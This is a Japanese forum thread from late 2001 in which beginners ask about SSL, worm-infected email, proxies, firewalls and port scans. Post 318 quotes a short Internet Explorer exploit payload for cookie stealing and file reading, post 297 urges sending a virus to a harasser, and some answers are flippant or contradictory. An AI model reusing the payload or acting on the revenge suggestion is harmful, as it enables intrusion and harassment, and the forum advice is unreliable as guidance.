SSLによる暗号化は、ネスケの鍵アイコンとは関係無いんでしょうか?

もしかしたら、すごく厨な質問かもしれませんが、よろしくお願いいたします。
カード情報送信しちゃったんで、恐ろしくて眠れません。

271 :名無しさん@お腹いっぱい。:01/12/25 19:49
>>270
あるよ
プロトコルがhttpsになってるのと鍵マークが出るのを確認してくれ

272 :名無しさん@お腹いっぱい。:01/12/25 19:58
>271

レスありがとうございます。
今、見てきましたが、ネスケでは、鍵マークが出なくて、httpのままみたいです。
IEでは、httpsになっているみたいですが。

ちなみに、この店なんですけど。
ttp://www.e-hobby.co.jp/

メールでの問い合わせには、下記の返事をもらいました。

-------------------------------------------------------
お問い合せの件でございますが、新システムでのクレジット決済はオ
ンライン決済をおこなっております。このオンライン決済は【お客
様】-【システム】間、【システム】-【クレジットカード会社】間は
SSLのセキュリティを行っており、今現在もっとも安全なオンライン
システムです。
-------------------------------------------------------------------

Internet Explorer4.5/Netscape Communicator 4.0.8 以上でご覧ください
という事のようですが…

騙されてますか?おれ。

273 :名無しさん@お腹いっぱい。:01/12/25 20:10
>>272
それは単にフレームでURL欄が変わってないのを見てるのでは?
レジでお会計の画面はちゃんと暗号化されてるぞ

274 :270&272:01/12/25 20:11
もういちど試してみましたが、フレームを新しいウインドウで開くと
そこは、httpsの鍵マークありになっている様です。

トップからフレームのままで買い物する場合には、前の書きこみの
通りになります。

これは、システムの不備という事でしょうか。
フレームのままで買い物するとやっぱりヤバイですか?

275 :270&272:01/12/25 20:13
>273

つまり、それで大丈夫という事ですか〜。
なんとも厨ですいません。

276 :名無しさん@お腹いっぱい。:01/12/25 20:21
>>275
大丈夫だ

もしそれが元でクレジットカードが悪用されたらそのショップを訴えろ

277 :270&272:01/12/25 20:27
>276

お騒がせいたしました。安心して眠れます。

それでは、名無しに戻ります。
ありがとうございました。

278 :名無しさん@質問:01/12/25 22:39
ちょっと質問させてください。
グリーティングカードからウィルスって感染する?
添付ファイルはないんだが。
送られてきたメールが感染してるかどうかってわからないの?

279 :名無しさん@お腹いっぱい。:01/12/25 22:44
>>278
ウイルス対策ソフトいれてないとわからんですよ
明日買ってきなさい

280 :名無しさん@質問:01/12/25 22:57
知らない人からグリーティングカードが送られてきたんだけど、
開封せずに削除の方向がいいよね?

281 :(;;゜Д゜)ガタガタ:01/12/25 23:31
こんなメールが来たんですけど、私が(私のPCが)どっかにメールしまくってるんでしょうか?

Subject: Delivery Status Notification
From: Mail Delivery Service <postmaster@libertysurf.fr>
Date: Mon, 24 Dec 2001 22:24:46 +0100

- These recipients of your message have been processed by the mail server:

ludovic.poncelet@libertysurf.fr; Action: Failed; Status: 5.2.2 (mailbox full)
manu.sup@libertysurf.fr; Action: Failed; Status: 5.2.2 (mailbox full)

Reporting-MTA: dns; mail.libertysurf.net
Received-from-MTA: dns; mx.port.ru (194.78.102.155)
Arrival-Date: Mon, 24 Dec 2001 22:24:45 +0100

Final-Recipient: rfc822; ludovic.poncelet@libertysurf.fr
Action: Failed
Status: 5.2.2 (mailbox full)

Final-Recipient: rfc822; manu.sup@libertysurf.fr
Action: Failed
Status: 5.2.2 (mailbox full)

添付ファイルは ATT91C5.eml です。

282 :名無しさん@お腹いっぱい。:01/12/25 23:38
>>280
郵便ポストに入ってるピンクチラシって普通読まずに捨てるわな。

>>281
メールしてるかどうかなんて使ってる本人が一番よく知ってるはずだが。

283 :名無しさん@お腹いっぱい。:01/12/25 23:40
>>281
メアド間違ったんじゃないの?

284 :(;;゜Д゜)ガタガタ:01/12/25 23:42
>282
すみません初心者なので。
勝手にメールするようなウィルスがあるように聞いたもんで。
私の言っている事おかしいですか?

285 :名無しさん@お腹いっぱい。:01/12/25 23:46
あのね、質問があります。
メールを開いたとたんにメディアプレイヤーが開くウイルスって分かりますか?
名前を教えて下さい★彡

286 :名無しさん@お腹いっぱい。:01/12/25 23:50
>>281
あなたがメール送った人のメールボックスの容量に空きがなかったから
送ったメールがそのまま帰ってきただけかも。

>>285
Badtranceでそういう症状があったかも。

287 :286:01/12/25 23:51
Badtransだった・・・

288 :名無しさん@お腹いっぱい。:01/12/25 23:57
即レスありがとうございます★彡
286、287!

289 :名無しさん@お腹いっぱい。:01/12/25 23:59
>>284
ウィルスに感染したんじゃないかな?と思うなら、
最初にウィルススキャンするのが普通でしょ。
言ってることはおかしくないけど、やってる事がおかしい。

>>285
http://www.google.co.jp/search?hl=ja&q=%83%81%81%5B%83%8B%82%F0%81%40%8AJ%82%A2%82%BD%81%40%83%81%83f%83B%83A%83v%83%8C%81%5B%83%84%81%5B%82%AA%81%40%8AJ%82%AD%81%40%83E%83C%83%8B%83X&lr=on&btnG=Google+%8C%9F%8D%F5

290 :名無しさん@お腹いっぱい。:01/12/26 00:17
場違いかもしれないんですが…本当困ってるんでお聞きします。
携帯電話に送信者『@docomo.ne.jp』から変態的なイタズラメールがくるんです。
それだけなら大した事無いのですが、私の名前入りで『〜サンへ』とかなってて
多分、犯人は私の友人の元彼だと思います。
彼女(私の友人)の話だとパソコンを使って送信者のメアドが『@docomo.ne.jp』
になるようにして送ってるみたいと言われたんですが…。
本当にそんなことできるんですか?

291 :名無しさん@お腹いっぱい。:01/12/26 00:20
>>290
できる

292 :名無しさん@お腹いっぱい。:01/12/26 00:22
>>290
簡単に出来る。

293 :名無しさん@お腹いっぱい。:01/12/26 00:23
すいません質問させてください。
プロクシをはずし忘れてWeb上で買い物をしてしまったのですが
その際に入力したクレジットカードの番号や個人情報は
SSLを使ったページでもプロクシのサーバ管理者にわかってしまう
ものなのでしょうか?
よろしくお願いします。

294 :名無しさん@お腹いっぱい。:01/12/26 00:27
>>293
知らない…

295 :293:01/12/26 00:33
>>294
そうですか・・・
google等で検索しているのですがちょっと見つからなくて。
もうちょっと調べてみます。

296 :名無しさん@お腹いっぱい。:01/12/26 00:38
>>291
>>292
やっぱり簡単に出来てしまうんですが…。
犯人と思われる彼もそんなにパソコンに関して詳しくないはずなので
多分簡単にできるのかとは思ったのですが。
ものすごい自分がガキっぽい事を考えてるのも承知のうえで
同じ方法で彼に
『〜くんへ パソコン使って変なメール送るのやめてください』
って仕返ししてやりたいです。きっと彼、『俺って凄い?』とか
思ってイイ気になってると思うと物凄い腹立たしいし…(-_-‖

297 :名無しさん@お腹いっぱい。:01/12/26 00:42
>>296
そいつのメアドわかってるならウイルス送ってやれ!

298 :名無しさん@お腹いっぱい。:01/12/26 00:42
>>296
自分のメアドかえればいいじゃん
変な奴は無視したほうがいいぞ

299 :(;;゜Д゜)ガタガタ:01/12/26 00:45
>289
THX
もちろん、スキャンはした上なのです。
ま、スキャンでOKならOKということで落ち着こうと思います。
他人に迷惑を掛けてたら困るな と思ったもので。
とにかくありがとう。みなさん。

300 :名無しさん@お腹いっぱい。:01/12/26 00:46
>>296
送信用アカウントの設定ちゃんと確認してからやってね(w
へたにやって、PCメールの本アドばらさないように(w

301 :名無しさん@お腹いっぱい。:01/12/26 00:47
先程友人から電話で質問されたのですが・・・。
「Returned mail: Host unknown」のメールがきたのですが
知らないアドレスが間違え先になっているとのことです。

出した覚えもないのに「宛先不明ですよ」って来るものなのでしょうか?

302 :名無しさん@お腹いっぱい。:01/12/26 00:49
>>301
ヘッダを確認してみな
まあほっとけばよい

303 :名無しさん@お腹いっぱい。:01/12/26 00:50
>>297
携帯電話のメアドは勿論知ってるのですが。普通にその携帯のアドレスから
何食わぬ雰囲気でメール送ってくるから更に腹立つんですが…
>>298
私も始めはそうしようと思ったのですが、彼私の電話番号も知ってるので
メアド変えて、教えないとなると多分今度は電話番号まで変える羽目になるかと。
変な意地張ってると自覚していますが変なヤツの為に何で私が
電話番号まで変えなきゃならないの!?という気持ちもありまして。

304 :名無しさん@お腹いっぱい。:01/12/26 00:52
>>302
ありがとうございます。
数日前Badtransにやられたばかりとのことで心配だったようなんで・・・。
ほっとくように言っておきます。

305 :名無しさん@お腹いっぱい。:01/12/26 00:53
>>303
人生相談になってきたのでこの辺で手を引く
他人のごたごたに巻き込まれたくないもんでな

306 :名無しさん@お腹いっぱい。:01/12/26 00:55
>>304
ヤパリ、、、感染したとき送信した奴の戻りメールぢゃん。。。

307 :名無しさん@お腹いっぱい。:01/12/26 00:56
>>293
そこらに転がっている匿名串を使ったなら、ご苦労さん。筒抜け。
生兵法は大怪我の基。

>>296
大人のオンナになるには報復なんてやめて、
素直にメールアドレスを受信禁止に入れておきなさい。

>>300
アドレス書き換えが出来る以上何とでもなる。

308 :304:01/12/26 01:01
>>306
なんたら.comとかいう業者(?)宛に出したのが
戻ってきた形になってたらしいんですが・・・
それって過去に見たどっかのHP内のアドレスなんでしょうかね。
それでそこから弾かれるとそういうものが返ってくるのでしょうか?

ん?ってことはそのメールを開いたらまた感染するんですよね。

309 :名無しさん@お腹いっぱい。:01/12/26 01:04
コンパネのネットワークフォルダにあるNetBEUIとかを削除したら、
セキュリティが上がるん?

310 :306:01/12/26 01:07
>>308
添付付いたままならね。。。パッチ当てて無かったらね。。。
http://pc.2ch.net/test/read.cgi/sec/1008355163/
↑もうだいぶサゲちゃったけど、、、ココ目を通しといて。
ひょっとすると、その業者、バドトランスメル来過ぎてア
ドレス閉じた可能性も有り??

311 :293:01/12/26 01:07
>>307
そうですか。
どこかの掲示板では大丈夫だと書いてあった記憶があるのですが
どうやら私の勘違いだったようですね。
フォームのメソッドはpostだったのだけど、プロクシのログに残るのかな?
わからん。

312 :名無しさん@お腹いっぱい。:01/12/26 01:09
>>300
うーん、でも実際今の私の知識じゃ、自分のアドレスばれないようにというか
同じ風に仕返しなんて無理そうです(´-`ヾ
>>305
申し訳ないですホント。板違いなのにスミマセン。。。
>>307
本当のところ大人のオンナとして割り切れるかどうか、まだ微妙です。
取り合えずメアド変えて、電話にイタズラ来るようならまた考えてみますね。

313 :306:01/12/26 01:09
ってーか、、、まさかキーログ送信の戻りぢゃ無かろう。。。

314 :304:01/12/26 01:18
>>306
ありがとうございます。今「猛威をふるう〜」スレ読んでます。

ところでキーログ送信ってなんでしょうか?
検索してもでてこなかったのですが・・・

315 :>>296:01/12/26 01:23
こんな方法でやってみそ

http://pc.2ch.net/test/read.cgi/sec/1009218193/l50

316 :293:01/12/26 01:28
自己解決しました。
過去ログあさったらみつかりました。
どうやらプロクシをさしていても大丈夫なようです。

http://developer.netscape.com/docs/manuals/proxy/ProxyUnx/SSL-TUNL.HTM

お騒がせしました。

317 :307:01/12/26 01:29
>>312
いや、元彼とどうのこうのってのはどうでも良くてさ、
周りの迷惑も考えてみてよ。ってだけよ。

318 :病院から医科大学へ御歳暮!:01/12/26 02:04
Internet Explorer Document.Open() Without Close() Cookie Stealing, File Reading, and Site Spoofing Bug
http://www.securiteam.com/windowsntfocus/6B00L003FU.html
http://www.osioniusx.com/
−−−−−
http://memo.st.ryukoku.ac.jp/archive/200112.month/2396.html
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to=''
attributeName=document.parentWindow.execScript(scr1.innerHTML), set1.outerHTML />
</noscript>

319 :まー:01/12/26 02:09
質問です。
教えてくださーい!!
PINGの意味ってなんですか?
それからPINGされると結局どうなるの?
メルアドとかバレるんですかね?
教えてくださいねー♪

320 :名無しさん@お腹いっぱい。:01/12/26 02:10
>>311
よくわからないのに匿名串を使って何かするのは
免許持ってないドキュソが車盗んで高速を逆走するぐらい無謀です(w

321 :名無しさん@お腹いっぱい。:01/12/26 02:12
>>319
http://www.google.com/search?q=cache:gbQ6bmgQ07A:www.kiu.ne.jp/tech/tools/ping/+ping&hl=ja&lr=lang_ja

322 :名無しさん@お腹いっぱい。:01/12/26 02:13
>>320
解決した問題に関してレスするのもドキュンだな(w

323 :名無しさん@お腹いっぱい。:01/12/26 02:17
>>322
ヽ(`Д´)ノもう来ねえよ!ウワァァン(w

324 :名無しさん@お腹いっぱい。:01/12/26 02:24
>>323
何かあったら帰ってこいよ。俺はいつでも待ってるぜ(w

325 :名無しさん@お腹いっぱい。:01/12/26 02:31
2chに書き込むときに、ZoneAlarmがいろいろと反応(ブロック)
するんですけど、どういう意味か知ってる人教えてください

326 :まー:01/12/26 02:34
321>
ありがとうございますvvv
でもよくわかんない(死
メルアドがバレるってことじゃないんですよね?

327 :名無しさん@お腹いっぱい。:01/12/26 02:37
>>326
答えてもらった全部のスレでお礼言ってこい

>>325
ログ読め

328 :325:01/12/26 03:32
>>327
このスレにはなかったので聞きました。
ZoneAlarmスレで解決できました。

329 :名無しさん@お腹いっぱい。:01/12/26 12:34
c:\program files\xerox\nwwiaフォルダが削除できません
safeモードなら削除できるけど、通常起動すると
また同じフォルダが作られてしまいます。
これってウィルスに感染しているのでしょうか?
一応ウィルスバスターでチェックしたけど無検出でした
どなたか教えてください

330 :名無しさん@お腹いっぱい。:01/12/26 12:37
マウスの入力が一切効かなくなる+画面が16色しか選べなくなる
この症状何ですか?今キーボードのみでカキコんでんだけど
いい加減疲れてきた・・・。

331 :名無しさん@お腹いっぱい。:01/12/26 12:38
>>329
アンインストーラーが削除してくれなかったのか?
xerox関連のアプリケーションが動いてるんじゃないのか?
DOSから削除しても消えないか?

332 :名無しさん@お腹いっぱい。:01/12/26 12:38
>>330
再起動してみなよ

333 :名無しさん@お腹いっぱい。:01/12/26 13:10
>>332
変らないんだけど。

334 :330:01/12/26 13:16
復元で直った。ヤター!

335 :名無しさん@お腹いっぱい。:01/12/26 13:17
>>333
セーフモードで起動してないか?
もしくはビデオカードのドライバがこわれてないか?

それにしてもマウスがきかないってことはないな
別のマウスつなげてやってみてくれ

336 :名無しさん@お腹いっぱい。:01/12/26 13:31
>>335
330=333=334
よって終了。

337 :330:01/12/26 13:35
>>332
>>335
ありがとうございました。原因はよく分らないままですが
とりあえず直りました。

338 :名無しさん@お腹いっぱい。:01/12/26 13:36
そもそも、なぜセキュ板?

339 :名無しさん@お腹いっぱい。:01/12/26 14:10
誤爆してほかのスレに書いてました。
こちらでよろしくお願いします。
詳細はこうなんです。

新しいマシンがXPproでとりあえずマカを入れた。
ついでゾヌの2.6.362を入れた。
で、マカフィーが嫌いだから、ノートンシステームワークス2002の
アンチウィルスを入れたら、ゾヌのプログラムの接続許可に全て×がついているんです。
マカのときはそんなことなかったのです。
98でゾヌとアンチウィルス2001を併用しているときも問題なかったです。
ネットなんかはできています。
XPのFWは切っています。
インストール手順はマカをアンイントールしてからノートンを入れました。

3っつが絡んでどこに書いたらいいかわかりませんでした。
過去レスは参照したんですが、見つけられなくて。
教えて君ですみません。よろしくお願いします

340 :329:01/12/26 14:19
>>331
すいません、DOSで削除とはどうするのでしょうか。

使用OSはXPHomeです、削除しようとすると
「ほかの人かプログラムが使用しているので削除できないよ」
みたいな事を言われるので、多分何かのプログラムが持っていて
放してくれないんだと思うんだけど
そのプログラムが特定できないのです。

341 :名無しさん@お腹いっぱい。:01/12/26 14:38
>>340
XPってDOSモード無かったんだっけ
使ってないから知らんのだが

xeroxといえば印刷関連のプログラムだと思うのだが
それらしきものをインストールしてないか?
ネットワークを介して利用してないか?

342 :名無しさん@お腹いっぱい。:01/12/26 14:43
>>340
起動ディスクある?

343 :なんだかよく分からないので:01/12/26 15:44
>>339
OS再インスト

344 :ノートン採用:01/12/26 17:14
アンチウイルスソフトを導入しましたが、本当に効果があるのか不安です。

色々な環境下で実験してみたいのですが、例えば無害なニセウイルスをメール
に添付して自分に送信して試したいのですがそのようなファイルはあるのでしょうか?

また、実験するつもりですが、「インターネット接続の共有」で接続している
親マシン(ルーター)にアンチウイルスソフトを入れて、子マシンからメール
を受信してもウイルス発見の効果はあるのでしょうか。

インターネット-----ケーブルモデム-----ルーターPC(ソフト有り)-----メインPC(ソフト無し)

345 :あのー:01/12/26 17:37
お勧めのノウハウ技術書探してます。
初心者スレッドに書き込むのはどうかとは思うのですが、一応『リソースキット』や『全機能Bible』は書棚に入っています。(ネットワーク関係の情報が貧弱)
最近内容が複雑怪奇すぎて正直疲れています。
セキュリティ設定ノウハウに関しては無知です。

346 :500ISE:01/12/26 18:16
ネットに接続してると玉に勝手に再起動するのだが
これは攻撃されてるのか?

347 :名無しさん@お腹いっぱい。:01/12/26 18:56
XPを使っているのですが、Cookieの中にindexと書いてあるDATファイルがあるのですがこれが削除
できません。削除しようとすると(indexを削除できませんほかの人またはプログラム
ファイルによって使用されています)となります。Cookieはすべて削除したいのですが
これは削除できないものまたは、削除してはならないものなのでしょうか?
それとも侵入されたものなのでしょうか。気になるので教えてください
ちなみにパソコンにインストールしているソフトはノートンSECURITYとフォトショップ、
ホームページビルダーです。

348 :名無しさん@お腹いっぱい。:01/12/26 20:00
>>347
googleで index.dat cookie をキーワードにして検索すれ

349 :名無しさん@お腹いっぱい。:01/12/26 20:27
zone alarmをアンインストールしたら、
windowsの起動時に文字化けしたエラーメッセージが
表示されるようになってしまいました。
辛うじて vsdata95.vxdという文字だけは確認できます。
どうにかして元に戻したいのですが、
何かアドバイスがあったら教えてください。

350 :329:01/12/26 20:44
>>340
そうか!xerox=ゼロックスか。
どこかのアダルトページに行った時に変なプログラムを
仕掛けられたのだと思い、削除しようとしていました。
ということは、このフォルダはプリンタドライバか何かが
使っているだけで、別に削除する必要は無いということでしょうか。
しかし今のマシではプリンタなどの機器は一切使っていないのに
なぜこんなフォルダができるのでしょうか。

>>341
CドライブのフォーマットをNTFSにしてしまったため
98の起動ディスクでは見れないようです。
XP用の起動ディスクというのがあるのでしょうか。


レス遅れて申し訳ないです

351 :名無しさん@お腹いっぱい。:01/12/26 21:11
>>345
セキュリティ関連の本も書店に山ほどあるね
とりあえずプロトコルの勉強から始めてみたらどうでしょ?

352 :名無しさん@お腹いっぱい。:01/12/26 21:12
>>346
んなこたーない

353 :名無しさん@お腹いっぱい。:01/12/26 22:00
348さん!ありがとうございました。おかげで解決しました。

354 :名無しさん@お腹いっぱい。:01/12/27 00:09
お腹いっぱい

355 :名無しさん@お腹いっぱい。:01/12/27 00:30
BlackICE入れてるんですが、アタック多くてこわいっす;
一度や二度ならいいけど、カウントが120超えてます。。。
BlackICEってぶっちゃけどうなんでしょうか。
こっちのほうがいいっていうのがあったら教えてください。
気になって朝も起きれません

356 :名無しさん@お腹いっぱい。:01/12/27 01:03
BlackICEよりsnortの方がいいと思うけど、
止めたほうがいいとも思う。

357 :名無しさん@お腹いっぱい。:01/12/27 01:17
なんか、20分ほど前にノートン先生のFireWallが、
トロイの木馬を止めてくれました。

確認してみると、わらわらといくつも
『なんたらかんたら』トロイの木馬を遮断
とありました。

なんか対策とったほうがいいですかね?

358 :名無しさん@お腹いっぱい。:01/12/27 01:25
>>357
外部からだったら別に何もしなくていい。
内部からだったら大変なこと。

359 :名無しさん@お腹いっぱい。:01/12/27 01:41
他スレで流されてしまったのでここで質問させていただきます。

SHIELDS UP!でPORTチェックすると、AlartTrackerがポートスキャンを三十分
遮断する、と表示されますがPORTチェックの結果にUPnPだけがOPENと出ます。
もう一度チェックするとStealthになりますがこれは安全なんでしょうか?
OSはXPでUPnPの修正パッチは当ててあります。

360 :357:01/12/27 01:45
>>358
どうやら内部からのものは無かったようですが、
外部から64個も、いろいろなトロイの木馬が届いてました。

361 :名無しさん@お腹いっぱい。:01/12/27 02:17
>>359
UPnPは使ってないなら、削除しちゃえば?
コントロールパネル>アプリの追加と削除>Windowsファイル>通信>
>詳細>ユニバーサルプラグアンドプレイのチェックを外す。
どう?

362 :359:01/12/27 06:32
Windowsファイル、というものがないんですが?

363 :名無しさん@お腹いっぱい。:01/12/27 07:14
>>357=>>360
随所で何度も言われてますが、
「トロイの木馬」は届きません
「トロイの木馬へのパケット」が届くのです
で、そこにトロイが無かったら…以下略。

364 :名無しさん@お腹いっぱい。:01/12/27 11:53
↓このスレッド何?ひらくだけでNAV反応するよぉ。

またIEにセキュリティホール! の283コロス!
http://pc.2ch.net/test/read.cgi/sec/1009377717/

365 :名無しさん@お腹いっぱい。:01/12/27 11:59
>>364
6-7に過剰反応してるんじゃない?

366 : :01/12/27 15:01
[Tue Dec 18 01:13:20 2001] [error][client 61.136.21.62] Client sent malformed Host header
こんなのがerrorlogにトキドキあるんですが
これはどんなerror?

367 :名無しさん@お腹いっぱい。 :01/12/27 15:15
添付ファイルなしのウィルス付メール(本人が事前に電話で教えてくれた)が
届きました。件名は「FF777…なんとかかんとか〜がお得」とかいう…???
速攻削除したので正確でなくてごめんなさい。
これって…なんでしょう?

368 :名無しさん@お腹いっぱい。:01/12/27 15:22
>>367
なんだろな〜
スキャンしてみれば?
その本人に聞くとか
シマンテックのページ見るとか

369 :名無しさん@お腹いっぱい。:01/12/27 15:22
>添付ファイルなしのウィルス付きメール
ウィルスの付いてないウィルス付きメールって何?
意味が分からない。

370 :367:01/12/27 16:26
友達から「ウィルスに感染しちゃったよーメール行くから削除して」と
電話があったのです。
んで、来たメールには添付ファイルがなかったのだけど
本文も見ずに削除しました。こんなこともあるのかな、と。
>368 ありがとう。やってみます。

371 :名無しさん@お腹いっぱい。:01/12/27 18:43
Shields UP ! の日本語解説サイト
http://www.upsizing.co.jp/news/report0426.htmにて
チェックしたところ、ポートが21,23,79,80と
開いているとなりました。
どうしたら閉じられるのでしょうか?

こんな環境です。
WIN98 5,1SP2 ケーブル接続 
Zone ノートンアンチウイルス

372 :名無しさん@お腹いっぱい。:01/12/27 19:02
21と23と79と80を閉じるように設定すればいい。
それぞれのサービスくらい自分で調べろ。

373 :371:01/12/27 19:04
372さん、ありがとうございます。
閉じる設定ができるのですね。
さっそく調べます。

374 :ずぶの素人くん:01/12/27 19:27
以下の件なんですが、お助けかりたく思います。

自宅で、2台のPC+ブロードバンド・ルータで、インターネット接続と
ローカルのネットワークをやってます。
NT4と2000がそれぞれインストールされてます。
それぞれの機種に、TCP/IPとNETBEUIを両方入れているのですが、

ttp://trylan.fc2web.com/Tips/security_2k.html

など参考にし、TCP/IPのWINS設定を変更しようとしてるんですが、
それらしい画面がみつかりません。
で、ひょっとして、M$社は、セキュリティ対策として

・インターネット=TCP/IP
・ローカルのネットワーク=NETBEUI

とすっぱりわけちゃったのかな?と思ったんですが、どうでしょう?
OSは、両方にSP6aとSP2のサービスパックを充ててあります。
両方とも、IE5.5でして、私はこの方面全くの門外漢です。(笑)
おかしな事いってるのかもしれないと思いつつ、恥をしのんで
お聞きしております。

よろしくお願いします。

375 :名無しさん@お腹いっぱい。:01/12/27 19:29
>>374

LANで一発OK
http://www.rodry.net/

376 :ずぶの素人くん:01/12/27 19:33
>>375
有り難うございます……といいたいところですが、これの
どこを読めばいいんでしょう?……(汗
(逆らってるんではないんです。スイマセン)

377 :ずぶの素人くん:01/12/27 19:40
ひょっとして、あっちで聞けって事ですか?
そうと解釈して移動いたします。
お邪魔しました。

378 :名無しさん@お腹いっぱい。:01/12/27 19:51
>>377 あっちいって聞く、じゃなくてまず>>375のサイトをちゃんと見ろよ。

379 :名無しさん@お腹いっぱい。:01/12/27 20:08
Blackiceをクリーンアンインストールできるツールなんかないかな?

380 :名無しさん@お腹いっぱい。:01/12/27 20:31
>>379
マルチするな。

381 ::01/12/27 21:04
どーでもいいが、javascript.exeって添付ファイルが大量に送られて来るのだがw
6656バイトのファイル。もしかして流行ってる?
http://inet.trendmicro.co.jp/virusinfo/isp/default3.asp?VName=WORM_ZOHER.A

382 :361 :01/12/27 21:30
>>362
ないわけないと思うぞ。>Windowsファイル
http://www.sharp.co.jp/support/mebius/tips/tips-zz22.htm
ここを参考に探してみなされ。
きっと見つかるよ。

383 :2チャンねらら:01/12/27 21:43
2ch型掲示板にはどれぐらい穴がありますか?
あったら教えてください。
下にリンクがあります。


2ch型マイナー掲示板「はにちゃんねる」
http://www.isn.ne.jp/~honey/honeychannel/
みんなリンク&紹介よろしく。

384 :2チャンネららら:01/12/27 22:11
Perlの書き込みはどこよ?

2ch型マイナー掲示板「はにちゃんねる」
http://www.isn.ne.jp/~honey/honeychannel/
みんなリンク&紹介よろしく。

385 :名無しさん@お腹いっぱい。:01/12/27 23:05
不用意に開けてしまったのですが、個人情報が抜き取られたのですか?
      ↓
http://usagi.tadaima.com/2chbbs/subback.html

386 :名無しさん@お腹いっぱい。:01/12/28 00:12
>>385
今すぐプロバイダーに連絡を

387 :(゚д゚)ウマー:01/12/28 00:25
>>381
システム改変無しで、ダイレクトアクションからメモリ常駐、alizっぽいね(w
コメント見る限り。やってる事は若干違うけど。
サイズ6kってば軽い。。
アレのソース、いぢったのかな。。。。
ダイレクトアクションする奴は、パッチ当ててない奴罹るとMASSメーラー
と化すのねん。ヤダヤダ。。。

388 :名無し:01/12/28 01:05
既出だったらすいません。自分ではなくて友達の話です。

「0」という件名のメール(添付無し)が知り合いから届いたが、
送り主に訊いたらメールは出していないとのこと。
どころかPCを起動もしていないらしい。
本人は既にメールを開いてしまった。

一応すぐ削除しとけと伝えておきましたが、
これはどうなんでしょう?助言頂ければ幸いです。

389 :名無しさん@お腹いっぱい。:01/12/28 01:11
>>388
ウイルスチェックをして問題なければ大丈夫だと思われ
ウイルス対策ソフトを持っていないとは言わせない

390 :名無し:01/12/28 01:24
>>389
ありがとうございます。
本人、賞味期限切れでカビの生えたウィルスソフトを
ずっとHDDの奥にしまい込んでいたようなので、
とりあえずオンラインスキャンでやらせます。

391 :名無しさん@お腹いっぱい。:01/12/28 03:56
ウイルスバスター2001使っているのですが、
ウイルス検索実行中にWebブラウジングやワープロ等別のアプリで作業をしていても
検索自体に支障は無いのでしょうか?
検索時間が長くなったりハードディスクのアクセスが悪くなるのは仕方が無いですが。

392 :名無しさん@お腹いっぱい。:01/12/28 04:01
>>391
だめ
検索中は回線を切れ

393 :385:01/12/28 07:16
>>386
プロバイダーは、ヤフーBBですが
何て説明すればいいのですか?

394 :名無しさん@お腹いっぱい。:01/12/28 07:21
>>393
なんともないから連絡しないでよし
ソース見れば分かるだろ

395 :385:01/12/28 07:25
>>394
大丈夫なんですね?ほっとしました
どうも、ありがとうございました

396 :名無しさん@お腹いっぱい。:01/12/28 14:35
>>395
騙されてるよ

397 :名無しさん@お腹いっぱい。:01/12/28 17:40
そのルータ、通過する全パケットのログを取るような設定にしてない?

って言われたんですが、意味がわかりません。
その設定を見る、直す、にはどうすればイイんですか?

398 :名無しさん@お腹いっぱい。:01/12/28 17:44
ルータの取説読めよ。アフォか

399 :名無しさん@お腹いっぱい。:01/12/28 19:04
NPFで「フ が インターネット にアクセス しようとしています」
って、たまに出るんだけど。
「フ」ってなんでしょ?

400 :名無しさん@お腹いっぱい。:01/12/28 19:09
フ.exeではなさそうだな

401 :名無しさん@お腹いっぱい。:01/12/28 19:14
制御コードですかね?

402 :名無しさん@お腹いっぱい。:01/12/28 19:15
>>399 文字化けしてるだけだと思われ。

403 :385:01/12/28 21:09
>>397
やっぱり連絡した方がいいのですか?

404 :名無しさん@お腹いっぱい。:01/12/28 22:20
TCP Port 6346のアクセスが急に多くなったのですが
これは何ですか??

405 :名無しさん@お腹いっぱい。:01/12/28 22:31
>>404
ポートにアクセスされてるんだろ

406 :名無しさん@お腹いっぱい。:01/12/29 01:18
>>402
とすると例えば、IEのプログラム名が文字化けしてるとかで、
NPFが「ヲイヲイ、IEは通せるけどフは通せないなっ、名前がIEなら
通してやるんだけどなっ」ってなことになってるってことですか?

407 :名無しさん@お腹いっぱい。:01/12/29 01:21
>>406 意味不明。

408 :名無しさん@お腹いっぱい。:01/12/29 01:27
>>407
なぜ意味不明? IEはただの例だと思うが…。

409 :名無しさん@お腹いっぱい。:01/12/29 01:59
私もです
あと 5634/tcp 6347/tcp も

410 :名無しさん@お腹いっぱい。:01/12/29 02:02
404>>
多分 gnutella

411 :名無しさん@お腹いっぱい。:01/12/29 13:41
初めてセキュリティソフトを買おうと思うのですが、何がいいでしょうか。
やっぱりノートン Internet Securoty2002がいいのですか?

412 :名無しさん@お腹いっぱい。:01/12/29 22:11
>>411
ノートンかバスターがいいと思うよ

413 :名無しさん@お腹いっぱい。:01/12/30 00:36
とある作業をしていたら、「PELOCKnt v2.04 Virus protection activated・・」
等とエラーが出て、アプリが強制終了してしまいます。
文脈からしてウィルスが関係してるっぽいんですが、一体どういう事なんでしょうか?

あと、PELOCKntってなんでしょうか?HDD内を検索してもそんなファイル有りませんし、
ネットで検索しても情報が得られないので気になるのですが・・

414 :名無しさん@お腹いっぱい。:01/12/30 00:56
>>413
ウイルスチェックはしてみたのか?

415 :413:01/12/30 01:10
>>414
恥ずかしながら持ってないんです・・<アンチウィルスソフト
これを機に買おうと思ってます。

416 :名無しさん@お腹いっぱい。:01/12/30 01:13
>>415
対策ソフトを持たずにネットをうろうろするな
今日は回線切って寝ろ
明日朝イチで買って来い

417 :名無しさん@お腹いっぱい。:01/12/30 01:59
基本的なことなのかもしれないですけど、
うまく調べることができなかったので、お聞きしたいですが。
ADSLの常時接続で、ネットしているのですが、
ブラウザやメーラーを立ち上げてない、接続していない、
ただPCを立ち上げているだけの状態でも、
不正浸入されてしまうのでしょうか?

418 :名無しさん@お腹いっぱい。:01/12/30 02:04
>>417
接続してないってのはモデムの電源切ってるってことか?
だったら侵入は無理

419 :417:01/12/30 02:07
>>418
ありがとうございます。
すみません。モデム自体は、PCの電源切っているときも、
ONになっています。
(常時モデムの電源はONということなのです。)
ということは、モデムの電源が入っていれば、
PC立ち上げた時点で、不法浸入できる状態になっている、
ということなのでしょうか?

420 :名無しさん@お腹いっぱい。:01/12/30 02:14
>>419
モデムの電源が入ってればモデムに侵入されるかもしれんな
でも個人のものに侵入される可能性はまずありえない
あんまり心配しないほうがいいぞ

421 :417:01/12/30 02:18
>>420
ありがとうございました。
じゃ、ブラウザを立ち上げてネットしている、とかではなければ、
PC立ち上げていても、不法浸入は大丈夫なんですね。
少し、ほっ、とできました。
ありがとうございました。

422 :名無しさん@お腹いっぱい。:01/12/30 02:20
>>421
